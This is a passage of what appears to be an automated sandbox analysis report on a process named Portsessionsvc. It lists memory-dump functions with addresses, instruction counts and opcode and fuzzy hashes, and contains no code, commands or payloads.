                                                              Function 00007FFD9B794935 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction ID: b9e38a45d214338207375f53aaff6657e60c872d555f0b4c04b9511e9fa82ff3
                                                              • Opcode Fuzzy Hash: 8131b47b867fc6b529868362e4b1c81cc5b27f3f3f8f66b61e33cd7e4fe003e0
                                                              • Instruction Fuzzy Hash: ADF08935B0EB5F4BE635DA9898605BA7364EF05340B134379D41AD32F6DF38EA018680
                                                              Function 00007FFD9B7959C5 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 480e1cf3399db463ee8d763d08c219c194c0af843d933756cacadf207396e873
                                                              • Instruction ID: 96c7d5dd94a90029190e827134d609d0d78527b473e1947ea4c465e17c4b37cd
                                                              • Opcode Fuzzy Hash: 480e1cf3399db463ee8d763d08c219c194c0af843d933756cacadf207396e873
                                                              • Instruction Fuzzy Hash: 08F0E52271AA444FC719B77CC8669F43BD0EF5622934D01F7E049CA1A3DC09D449C751
                                                              Function 00007FFD9B7B1D49 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction ID: ed2c4dbbe90490d199d0fc8ea0ed0570fdc47263a940487e524eb35db3123ffd
                                                              • Opcode Fuzzy Hash: c421ea41a7e7ff8a7e86527cfb9b4aa6c766f339f38d6ae638c6ffca413eee46
                                                              • Instruction Fuzzy Hash: 6BE09230B1A7C44FCB0AAA3888684607BB1EF6720278952FFC445CB2E3D928DC89C741
                                                              Function 00007FFD9B7810C0 Relevance: .0, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76f6ea66b02311a99c5483d056f84c27f887406c0c6c2879f1a4957a8152e289
                                                              • Instruction ID: 8a3234a4baa453829ba6b0cd3672d9906f1e32dec699cc9203684cb2217197e4
                                                              • Opcode Fuzzy Hash: 76f6ea66b02311a99c5483d056f84c27f887406c0c6c2879f1a4957a8152e289
                                                              • Instruction Fuzzy Hash: 31E02625B4CC490AEB6CAA742CF25B07282DB85311B0502BAD02EC22DACC196C814281
                                                              Function 00007FFD9B7B8299 Relevance: .0, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction ID: 418bc479a2730b1b89f34b398ef291d3a93538327c482a4cecd08725bfa39a09
                                                              • Opcode Fuzzy Hash: 431acb96b77fb28091be9bfc8ff89f9820b0fd51ebc010f25483a7aa505525dd
                                                              • Instruction Fuzzy Hash: 82E04F30A197844FCB0A9B2888699503BB0EF6B21178A40EBC049CF1F3E629DC48C752
                                                              Function 00007FFD9B784B77 Relevance: .0, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction ID: 8ff9a74c172d593a99d19d8d17c87831a92da2d8bf39a88eb2c060635687cbe1
                                                              • Opcode Fuzzy Hash: 6a1b2f102a6176cb28416137329539e1ae1a6454c59c76c1dfc2125f6e29a98f
                                                              • Instruction Fuzzy Hash: 38E0D863F0DE0D0EF2A4D55804B43B825C1DF58762F0603BAD00EC22B2FD281D414241
                                                              Function 00007FFD9B7BD7E9 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction ID: fdef9bf5e5cd33f083a5d342d4c5a74af720a8d6a8f45fec749f27a802b7c12e
                                                              • Opcode Fuzzy Hash: bd23af48d80b9028cff80ca5e6856a8360942cf9daddfa76dd6e14908e1984cb
                                                              • Instruction Fuzzy Hash: AAE08631A497804FC7095B2888A98543BB0DF6711278A40FBC005CF2B3D62DDC89C711
                                                              Function 00007FFD9B795380 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction ID: b61c8b3a24e5e9fe93ea92e9a5c6236a7505e948a5b4c10c68850a5d05c6efb2
                                                              • Opcode Fuzzy Hash: ace303399836f14eb33aaf010cbd8b6679ae566b1ad7189f9ccf16d6c4b789ca
                                                              • Instruction Fuzzy Hash: 6DD05E30B60A0D4B8B4CA62D8458430B3D2E7AA2067D45278940BC6295ED25ECC68B80
                                                              Function 00007FFD9B783276 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction ID: 4b7b4d292ed0ec8a4721965bc28670ff99bf46d5edff54a11296b8e382a75cb2
                                                              • Opcode Fuzzy Hash: 2d59f36901ba77a1d5173b1770939f6bebda0635c63cd8e0b3e37dab8a24d587
                                                              • Instruction Fuzzy Hash: D5E01230F0DA1E46FBA49144C8A07E97394EF94312F1601B8D58EA33E1DD38AFC48A45
                                                              Function 00007FFD9B7BA670 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B7BA5E0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                              Function 00007FFD9B793BD0 Relevance: .0, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                              • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                              • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                              Function 00007FFD9B7B9059 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction ID: 9092713a171e2d5dad25970d90dfa1a4dd6ca75999bd10eba25e6c1d4413d71b
                                                              • Opcode Fuzzy Hash: df427db11c4b8b1adbad613056556dcb95fb70cc3927cb4c4236a00b99d5bef6
                                                              • Instruction Fuzzy Hash: C8E0173150A7884FCB0BAB348CA99803FB0EE6B21178B01C7D045CF5B3EA598D89C762
                                                              Function 00007FFD9B7B7A09 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction ID: d23d908daa4caa6190485d6fb195fe7573d829f4088949ca24af75020e520b84
                                                              • Opcode Fuzzy Hash: 8cc84ed8f1dfa8a68fc1917448678c270b1a1f028bc4073e877321ca715a2d44
                                                              • Instruction Fuzzy Hash: 9AE04F31A4F7C04FC74B973488788507FA1DE5721074A45EEC085CF5B3D6198D49C701
                                                              Function 00007FFD9B7BD869 Relevance: .0, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction ID: bf4e0e619de8f275e65c4db50b820028ece5d949631a47f6ca0e263d6d0719b4
                                                              • Opcode Fuzzy Hash: dc0893e6972b1db24272a6556afb45700994b964ecba2b9cc7463da4df9d0a74
                                                              • Instruction Fuzzy Hash: 50E04F6194F7C04FC70B9B3588B88407F60EE2721178A45EEC085CF1B3E6198C49C701
                                                              Function 00007FFD9B7BCF79 Relevance: .0, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction ID: 226f5cdc0ad8bc2c5e4dff0f02c3e0c1f604d46dfeb201affb1b12e14cf5709f
                                                              • Opcode Fuzzy Hash: 70e04e2a095345de69a44cc4f4a7a3ebee4407e6c86ec40a26d25b3b58c45cbd
                                                              • Instruction Fuzzy Hash: B7E0EC3150A7844FC70A9B2488A99943FB0EF2621178A01EBC449CF5B3D6299888CB52
                                                              Function 00007FFD9B7B1DF0 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                              Function 00007FFD9B7BB958 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction ID: 70612281d9585890a6d6f4cf59acf35b8267b14e10d1c9ea082ef5e7cea4887d
                                                              • Opcode Fuzzy Hash: cbfe45211ad73ac3c17ab894c132553cfacac7f021d9affde010218669dfca01
                                                              • Instruction Fuzzy Hash: E9D01234B519044FC71CA63C886987473D1EB6A217B9541B9D00AD72B1D96ADD89CB41
                                                              Function 00007FFD9B7B7070 Relevance: .0, Instructions: 17COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction ID: 7d5a485abe3f1a101fe236d7c12fdd607988a3ec4558fc01dadeabbbd6232ba3
                                                              • Opcode Fuzzy Hash: 7479cc42ffc60ba2653225b21c49bf0392be7e12deb69c3dfb1531d468da8461
                                                              • Instruction Fuzzy Hash: 6BD02230B649040FC70CAA3C88588307390EB6A20278100A8D00BD72B1E92ADD88CB40
                                                              Function 00007FFD9B780B9D Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction ID: 2a1721bd37c2c0e229c6edeb69d2e9e63533fe1581581a77562d8443ec22fc0d
                                                              • Opcode Fuzzy Hash: ba44e30b299232d18dd58396ab05012bbb058ffb7b5d4e444c28c93c79ff008a
                                                              • Instruction Fuzzy Hash: E7C0123062990E8FDA40BB28C8C9824BBA0FB0E202BDA01E4E00CC71B1D629A8908700
                                                              Function 00007FFD9B7B2608 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B7B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b7b1000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 950bae476377a60c31a855be73f4e2c850538c4536ecd9311385f276679a1fd2
                                                              • Instruction ID: d706e9dff74a5d313b84353e58900511a62814fdd5b24ab6df09e354963bacab
                                                              • Opcode Fuzzy Hash: 950bae476377a60c31a855be73f4e2c850538c4536ecd9311385f276679a1fd2
                                                              • Instruction Fuzzy Hash: 16D05E65B1E7AA4AE764A6989C71BB97691AF44300F0506B4E41D836E7DC183C408E82
                                                              Function 00007FFD9B7806AD Relevance: .0, Instructions: 13COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction ID: faff3e12c8c9fe63c49ea462aac9b206cb8c5b8a4464a0f790921376c9a1d048
                                                              • Opcode Fuzzy Hash: a8057b2a2e29e7e3848875d95335190a1301d675519968e9b42c91e4c58ee40f
                                                              • Instruction Fuzzy Hash: B7C04C05F5FF5F01E47531EE54E60ADB6409FC4A26FE31772D50D801B29C6E22D50196
                                                              Function 00007FFD9B7812B8 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction ID: 693aefd0555aa7c13d0ffe86cffec59e3527bad17fa240652fc2ed9797b61d88
                                                              • Opcode Fuzzy Hash: 3787d7a6cd85340d052397785a9d428e4e8ed80fe274377175b62aa4ea2664cd
                                                              • Instruction Fuzzy Hash: 5CC08C30611C0C8FC908EB28C88480433A0FB09201BC200A0E00AC7170D229DCC0C740
                                                              Function 00007FFD9B7854F9 Relevance: .0, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c887ebbdf529bb6cbff72f160e5c3645b13314979461e80d37359e32bd5a576
                                                              • Instruction ID: 3972a79cbe887e9ff7602caff64bbf0cc6a2878d577b53beb1c338a249d8aad2
                                                              • Opcode Fuzzy Hash: 2c887ebbdf529bb6cbff72f160e5c3645b13314979461e80d37359e32bd5a576
                                                              • Instruction Fuzzy Hash: 04C08C04F18C1E4AF21B2B14043023D04434B84305F8941B0E41EC77DECC2D5F0202C6
                                                              Function 00007FFD9B7806D0 Relevance: .0, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction ID: 55681b21aa852a478038f68aa83c82495a066b141e3c6cd6be9a93864b0cfab4
                                                              • Opcode Fuzzy Hash: 807f6b4b69133c31bf548507f2ec2c4152f6a71d8028e8e319ca7a4a2011544e
                                                              • Instruction Fuzzy Hash: 9DB01200D5BD4F00E42431FB08D30647440AF84105FD30270E40C802B2986E12940282

                                                              Non-executed Functions

                                                              Function 00007FFD9B7809B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000027.00000002.2339945459.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_39_2_7ffd9b780000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: c9$!k9$"s9$#{9
                                                              • API String ID: 0-1692736845
                                                              • Opcode ID: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction ID: a8db8b9a5516349690576d0cceb03b37db2f7a8324dbcda29aa8caba863ed978
                                                              • Opcode Fuzzy Hash: be64be5333022bf308476621d778135d585de084caa77ddb1cf8954df1b0d530
                                                              • Instruction Fuzzy Hash: EE51CE0BB8E52A49E31933FD75618FC6B458FA5335B0843B7F06E890DB8E18608186E5

                                                              Executed Functions

                                                              Function 00007FFD9B790D48 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5X_H
                                                              • API String ID: 0-3241812158
                                                              • Opcode ID: cda3b3b9a2a49db45e9a8d53dbce9e35b29ddd3bddfe6d473363f1ae40d34459
                                                              • Instruction ID: 29f063182c57eca663751bf71670f82c3d3931722aacae5fc338d9f07f1de555
                                                              • Opcode Fuzzy Hash: cda3b3b9a2a49db45e9a8d53dbce9e35b29ddd3bddfe6d473363f1ae40d34459
                                                              • Instruction Fuzzy Hash: 369105B5A29A8D8FEB99DF6888B57A87FE1FF56310F0101BBD049C73E6DA7814108740
                                                              Function 00007FFD9B790C25 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: a64e4ca41338474510a3bfb2628ff02e6f8860635833769286d06826ddaab96e
                                                              • Instruction ID: c8abf98dca80b4fb1aec9d02841c460e94c587880d9fa390742434886eb6e4f6
                                                              • Opcode Fuzzy Hash: a64e4ca41338474510a3bfb2628ff02e6f8860635833769286d06826ddaab96e
                                                              • Instruction Fuzzy Hash: 0D11C036A1D78D8FE712DBA4C8111ED7BA0EF42324F1646B7D4548B1E2D634264AC791
                                                              Function 00007FFD9B79108D Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: V
                                                              • API String ID: 0-1342839628
                                                              • Opcode ID: 663a53c435943bc29737e5aaf8c8cb39bb1b7734148f7a22894987a16699d54e
                                                              • Instruction ID: b324fa3a7becc6f4f39abfd211d726124d72e55780d0522350f1a8565b9c1272
                                                              • Opcode Fuzzy Hash: 663a53c435943bc29737e5aaf8c8cb39bb1b7734148f7a22894987a16699d54e
                                                              • Instruction Fuzzy Hash: 4101F924A8E6C61FE7595BB44CB19F13B91DF8725070A01FAD099CB5F3C81D19578361
                                                              Function 00007FFD9B790C38 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_40_2_7ffd9b790000_Portsessionsvc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: aea27c60f233c48e2233d6ef2fa341ec4c2c2bb0506a7e3befbea505fe99521b
                                                              • Instruction ID: 917ddc79657ba49fe2da4ade51086b4f4301cee10d30782d1703e215eaa52abf
                                                              • Opcode Fuzzy Hash: aea27c60f233c48e2233d6ef2fa341ec4c2c2bb0506a7e3befbea505fe99521b
                                                              • Instruction Fuzzy Hash: EB11AC35A1978D8FE702EBA4C8612E87BB0EF42210F0645B7C094DB2A6D6382649CB91
                                                              Function 00007FFD9B790C40 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000028.00000002.2323089246.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
